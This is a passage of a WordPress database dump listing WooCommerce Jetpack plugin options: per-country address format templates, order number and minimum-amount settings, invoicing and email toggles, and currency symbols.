{city}\n{country}','yes'),(815,'wcj_address_formats_country_DM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(816,'wcj_address_formats_country_DO','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(817,'wcj_address_formats_country_DZ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(818,'wcj_address_formats_country_EC','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(819,'wcj_address_formats_country_EE','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(820,'wcj_address_formats_country_EG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(821,'wcj_address_formats_country_EH','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(822,'wcj_address_formats_country_ER','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(823,'wcj_address_formats_country_ES','{name}\n{company}\n{address_1}\n{address_2}\n{postcode} {city}\n{state}\n{country}','yes'),(824,'wcj_address_formats_country_ET','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(825,'wcj_address_formats_country_FI','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(826,'wcj_address_formats_country_FJ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(827,'wcj_address_formats_country_FK','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(828,'wcj_address_formats_country_FM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(829,'wcj_address_formats_country_FO','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(830,'wcj_address_formats_country_FR','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city_upper}\n{country}','yes'),(831,'wcj_address_formats_country_GA','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(832,'wcj_address_formats_country_GB','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(833,'wcj_address_formats_country_GD','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(834,'wcj_address_formats_country_GE','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(835,'wcj_address_formats_country_GF','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(836,'wcj_address_formats_country_GG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(837,'wcj_address_formats_country_GH','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(838,'wcj_address_formats_country_GI','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(839,'wcj_address_formats_country_GL','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(840,'wcj_address_formats_country_GM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(841,'wcj_address_formats_country_GN','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(842,'wcj_address_formats_country_GP','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(843,'wcj_address_formats_country_GQ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(844,'wcj_address_formats_country_GR','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(845,'wcj_address_formats_country_GS','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(846,'wcj_address_formats_country_GT','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(847,'wcj_address_formats_country_GW','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(848,'wcj_address_formats_country_GY','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(849,'wcj_address_formats_country_HK','{company}\n{first_name} {last_name_upper}\n{address_1}\n{address_2}\n{city_upper}\n{state_upper}\n{country}','yes'),(850,'wcj_address_formats_country_HM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(851,'wcj_address_formats_country_HN','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(852,'wcj_address_formats_country_HR','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(853,'wcj_address_formats_country_HT','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(854,'wcj_address_formats_country_HU','{name}\n{company}\n{city}\n{address_1}\n{address_2}\n{postcode}\n{country}','yes'),(855,'wcj_address_formats_country_ID','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(856,'wcj_address_formats_country_IE','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(857,'wcj_address_formats_country_IL','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(858,'wcj_address_formats_country_IM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(859,'wcj_address_formats_country_IN','{company}\n{name}\n{address_1}\n{address_2}\n{city} - {postcode}\n{state}, {country}','yes'),(860,'wcj_address_formats_country_IO','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(861,'wcj_address_formats_country_IQ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(862,'wcj_address_formats_country_IR','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(863,'wcj_address_formats_country_IS','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(864,'wcj_address_formats_country_IT','{company}\n{name}\n{address_1}\n{address_2}\n{postcode}\n{city}\n{state_upper}\n{country}','yes'),(865,'wcj_address_formats_country_JE','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(866,'wcj_address_formats_country_JM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(867,'wcj_address_formats_country_JO','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(868,'wcj_address_formats_country_JP','{postcode}\n{state}{city}{address_1}\n{address_2}\n{company}\n{last_name} {first_name}\n{country}','yes'),(869,'wcj_address_formats_country_KE','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(870,'wcj_address_formats_country_KG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(871,'wcj_address_formats_country_KH','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(872,'wcj_address_formats_country_KI','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(873,'wcj_address_formats_country_KM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(874,'wcj_address_formats_country_KN','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(875,'wcj_address_formats_country_KP','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(876,'wcj_address_formats_country_KR','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(877,'wcj_address_formats_country_KW','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(878,'wcj_address_formats_country_KY','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(879,'wcj_address_formats_country_KZ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(880,'wcj_address_formats_country_LA','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(881,'wcj_address_formats_country_LB','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(882,'wcj_address_formats_country_LC','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(883,'wcj_address_formats_country_LI','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(884,'wcj_address_formats_country_LK','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(885,'wcj_address_formats_country_LR','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(886,'wcj_address_formats_country_LS','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(887,'wcj_address_formats_country_LT','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(888,'wcj_address_formats_country_LU','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(889,'wcj_address_formats_country_LV','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(890,'wcj_address_formats_country_LY','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(891,'wcj_address_formats_country_MA','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(892,'wcj_address_formats_country_MC','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(893,'wcj_address_formats_country_MD','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(894,'wcj_address_formats_country_ME','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(895,'wcj_address_formats_country_MF','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(896,'wcj_address_formats_country_MG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(897,'wcj_address_formats_country_MH','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(898,'wcj_address_formats_country_MK','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(899,'wcj_address_formats_country_ML','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(900,'wcj_address_formats_country_MM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(901,'wcj_address_formats_country_MN','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(902,'wcj_address_formats_country_MO','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(903,'wcj_address_formats_country_MQ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(904,'wcj_address_formats_country_MR','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(905,'wcj_address_formats_country_MS','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(906,'wcj_address_formats_country_MT','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(907,'wcj_address_formats_country_MU','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(908,'wcj_address_formats_country_MV','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(909,'wcj_address_formats_country_MW','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(910,'wcj_address_formats_country_MX','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(911,'wcj_address_formats_country_MY','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(912,'wcj_address_formats_country_MZ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(913,'wcj_address_formats_country_NA','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(914,'wcj_address_formats_country_NC','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(915,'wcj_address_formats_country_NE','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(916,'wcj_address_formats_country_NF','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(917,'wcj_address_formats_country_NG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(918,'wcj_address_formats_country_NI','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(919,'wcj_address_formats_country_NL','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(920,'wcj_address_formats_country_NO','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(921,'wcj_address_formats_country_NP','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(922,'wcj_address_formats_country_NR','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(923,'wcj_address_formats_country_NU','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(924,'wcj_address_formats_country_NZ','{name}\n{company}\n{address_1}\n{address_2}\n{city} {postcode}\n{country}','yes'),(925,'wcj_address_formats_country_OM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(926,'wcj_address_formats_country_PA','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(927,'wcj_address_formats_country_PE','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(928,'wcj_address_formats_country_PF','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(929,'wcj_address_formats_country_PG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(930,'wcj_address_formats_country_PH','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(931,'wcj_address_formats_country_PK','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(932,'wcj_address_formats_country_PL','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(933,'wcj_address_formats_country_PM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(934,'wcj_address_formats_country_PN','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(935,'wcj_address_formats_country_PS','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(936,'wcj_address_formats_country_PT','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(937,'wcj_address_formats_country_PW','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(938,'wcj_address_formats_country_PY','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(939,'wcj_address_formats_country_QA','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(940,'wcj_address_formats_country_RE','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(941,'wcj_address_formats_country_RO','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(942,'wcj_address_formats_country_RS','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(943,'wcj_address_formats_country_RU','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(944,'wcj_address_formats_country_RW','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(945,'wcj_address_formats_country_SA','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(946,'wcj_address_formats_country_SB','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(947,'wcj_address_formats_country_SC','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(948,'wcj_address_formats_country_SD','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(949,'wcj_address_formats_country_SE','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(950,'wcj_address_formats_country_SG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(951,'wcj_address_formats_country_SH','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(952,'wcj_address_formats_country_SI','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(953,'wcj_address_formats_country_SJ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(954,'wcj_address_formats_country_SK','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(955,'wcj_address_formats_country_SL','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(956,'wcj_address_formats_country_SM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(957,'wcj_address_formats_country_SN','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(958,'wcj_address_formats_country_SO','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(959,'wcj_address_formats_country_SR','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(960,'wcj_address_formats_country_SS','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(961,'wcj_address_formats_country_ST','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(962,'wcj_address_formats_country_SV','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(963,'wcj_address_formats_country_SX','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(964,'wcj_address_formats_country_SY','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(965,'wcj_address_formats_country_SZ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(966,'wcj_address_formats_country_TC','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(967,'wcj_address_formats_country_TD','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(968,'wcj_address_formats_country_TF','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(969,'wcj_address_formats_country_TG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(970,'wcj_address_formats_country_TH','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(971,'wcj_address_formats_country_TJ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(972,'wcj_address_formats_country_TK','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(973,'wcj_address_formats_country_TL','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(974,'wcj_address_formats_country_TM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(975,'wcj_address_formats_country_TN','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(976,'wcj_address_formats_country_TO','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(977,'wcj_address_formats_country_TR','{name}\n{company}\n{address_1}\n{address_2}\n{postcode} {city} {state}\n{country}','yes'),(978,'wcj_address_formats_country_TT','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(979,'wcj_address_formats_country_TV','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(980,'wcj_address_formats_country_TW','{company}\n{last_name} {first_name}\n{address_1}\n{address_2}\n{state}, {city} {postcode}\n{country}','yes'),(981,'wcj_address_formats_country_TZ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(982,'wcj_address_formats_country_UA','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(983,'wcj_address_formats_country_UG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(984,'wcj_address_formats_country_US','{name}\n{company}\n{address_1}\n{address_2}\n{city}, {state_code} {postcode}\n{country}','yes'),(985,'wcj_address_formats_country_UY','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(986,'wcj_address_formats_country_UZ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(987,'wcj_address_formats_country_VA','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(988,'wcj_address_formats_country_VC','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(989,'wcj_address_formats_country_VE','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(990,'wcj_address_formats_country_VG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(991,'wcj_address_formats_country_VN','{name}\n{company}\n{address_1}\n{city}\n{country}','yes'),(992,'wcj_address_formats_country_VU','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(993,'wcj_address_formats_country_WF','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(994,'wcj_address_formats_country_WS','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(995,'wcj_address_formats_country_YE','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(996,'wcj_address_formats_country_YT','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(997,'wcj_address_formats_country_ZA','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(998,'wcj_address_formats_country_ZM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(999,'wcj_address_formats_country_ZW','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(1000,'wcj_address_formats_country_default','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(1001,'wcj_orders_enabled','no','yes'),(1002,'wcj_order_minimum_amount','0','yes'),(1003,'wcj_order_minimum_amount_error_message','You must have an order with a minimum of %s to place your order, your current order total is %s.','yes'),(1004,'wcj_order_minimum_amount_cart_notice_enabled','no','yes'),(1005,'wcj_order_minimum_amount_cart_notice_message','You must have an order with a minimum of %s to place your order, your current order total is %s.','yes'),(1006,'wcj_order_minimum_amount_stop_from_seeing_checkout','no','yes'),(1007,'wcj_order_auto_complete_enabled','no','yes'),(1008,'wcj_orders_list_custom_columns_country','no','yes'),(1009,'wcj_order_numbers_enabled','no','yes'),(1010,'wcj_order_number_sequential_enabled','yes','yes'),(1011,'wcj_order_number_counter','1','yes'),(1012,'wcj_order_number_prefix','','yes'),(1013,'wcj_order_number_date_prefix','','yes'),(1014,'wcj_order_number_min_width','0','yes'),(1015,'wcj_order_number_suffix','','yes'),(1016,'wcj_order_number_date_suffix','','yes'),(1017,'wcj_order_custom_statuses_enabled','no','yes'),(1018,'wcj_orders_custom_statuses_default_status','pending','yes'),(1019,'wcj_orders_custom_statuses_add_to_bulk_actions','yes','yes'),(1020,'wcj_orders_custom_statuses_add_to_reports','yes','yes'),(1021,'wcj_pdf_invoicing_enabled','no','yes'),(1022,'wcj_invoicing_invoice_create_on','disabled','yes'),(1023,'wcj_invoicing_proforma_invoice_create_on','disabled','yes'),(1024,'wcj_invoicing_packing_slip_create_on','disabled','yes'),(1025,'wcj_invoicing_credit_note_create_on','disabled','yes'),(1026,'wcj_invoicing_custom_doc_create_on','disabled','yes'),(1027,'wcj_invoicing_hide_disabled_docs_settings','no','yes'),(1028,'wcj_emails_enabled','no','yes'),(1029,'wcj_emails_custom_emails_total_number','1','yes'),(1030,'wcj_emails_cc_email','','yes'),(1031,'wcj_emails_bcc_email','','yes'),(1032,'wcj_currency_enabled','no','yes'),(1033,'wcj_currency_hide_symbol','no','yes'),(1034,'wcj_currency_AFN','AFN','yes'),(1035,'wcj_currency_ALL','ALL','yes'),(1036,'wcj_currency_DZD','DZD','yes'),(1037,'wcj_currency_AOA','AOA','yes'),(1038,'wcj_currency_ARS','ARS','yes'),(1039,'wcj_currency_AMD','AMD','yes'),(1040,'wcj_currency_AWG','AWG','yes'),(1041,'wcj_currency_AUD','&#36;','yes'),(1042,'wcj_currency_AZN','AZN','yes'),(1043,'wcj_currency_BSD','BSD','yes'),(1044,'wcj_currency_BHD','BHD','yes'),(1045,'wcj_currency_BDT','BDT','yes'),(1046,'wcj_currency_BBD','BBD','yes'),(1047,'wcj_currency_BYR','BYR','yes'),(1048,'wcj_currency_BZD','BZD','yes'),(1049,'wcj_currency_BTN','BTN','yes'),(1050,'wcj_currency_BOB','BOB','yes'),(1051,'wcj_currency_BAM','BAM','yes'),(1052,'wcj_currency_BWP','BWP','yes'),(1053,'wcj_currency_BRL','&#82;&#36;','yes'),(1054,'wcj_currency_GBP','&pound;','yes'),(1055,'wcj_currency_BND','BND','yes'),(1056,'wcj_currency_BGN','BGN','yes'),(1057,'wcj_currency_BIF','BIF','yes'),(1058,'wcj_currency_KYD','KYD','yes'),(1059,'wcj_currency_KHR','KHR','yes'),(1060,'wcj_currency_CAD','CAD','yes'),(1061,'wcj_currency_CVE','CVE','yes'),(1062,'wcj_currency_XAF','XAF','yes'),(1063,'wcj_currency_GQE','GQE','yes'),(1064,'wcj_currency_XPF','XPF','yes'),(1065,'wcj_currency_CLP','CLP','yes'),(1066,'wcj_currency_CNY','&yen;','yes'),(1067,'wcj_currency_COP','COP','yes'),(1068,'wcj_currency_KMF','KMF','yes'),(1069,'wcj_currency_CDF','CDF','yes'),(1070,'wcj_currency_CRC','CRC','yes'),(1071,'wcj_currency_HRK','HRK','yes'),(1072,'wcj_currency_CUC','CUC','yes'),(1073,'wcj_currency_CZK','&#75;&#269;','yes'),(1074,'wcj_currency_DKK','&#107;&#114;','yes'),(1075,'wcj_currency_DJF','DJF','yes'),(1076,'wcj_currency_DOP','DOP','yes'),(1077,'wcj_currency_XCD','XCD','yes'),(1078,'wcj_currency_EGP','EGP','yes'),(1079,'wcj_currency_ERN','ERN','yes'),(1080,'wcj_currency_EEK','EEK','yes'),(1081,'wcj_currency_ETB','ETB','yes'),(1082,'wcj_currency_EUR','&euro;','yes'),(1083,'wcj_currency_FKP','FKP','yes'),(1084,'wcj_currency_FJD','FJD','yes'),(1085,'wcj_currency_GMD','GMD','yes'),(1086,'wcj_currency_GEL','GEL','yes'),(1087,'wcj_currency_GHS','GHS','yes'),(1088,'wcj_currency_GIP','GIP','yes'),(1089,'wcj_currency_GTQ','GTQ','yes'),(1090,'wcj_currency_GNF','GNF','yes'),(1091,'wcj_currency_GYD','GYD','yes'),(1092,'wcj_currency_HTG','HTG','yes'),(1093,'wcj_currency_HNL','HNL','yes'),(1094,'wcj_currency_HKD','&#36;','yes'),(1095,'wcj_currency_HUF','&#70;&#116;','yes'),(1096,'wcj_currency_ISK','ISK','yes'),(1097,'wcj_currency_INR','&#8377;','yes'),(1098,'wcj_currency_IDR','Rp','yes'),(1099,'wcj_currency_IRR','IRR','yes'),(1100,'wcj_currency_IQD','IQD','yes'),(1101,'wcj_currency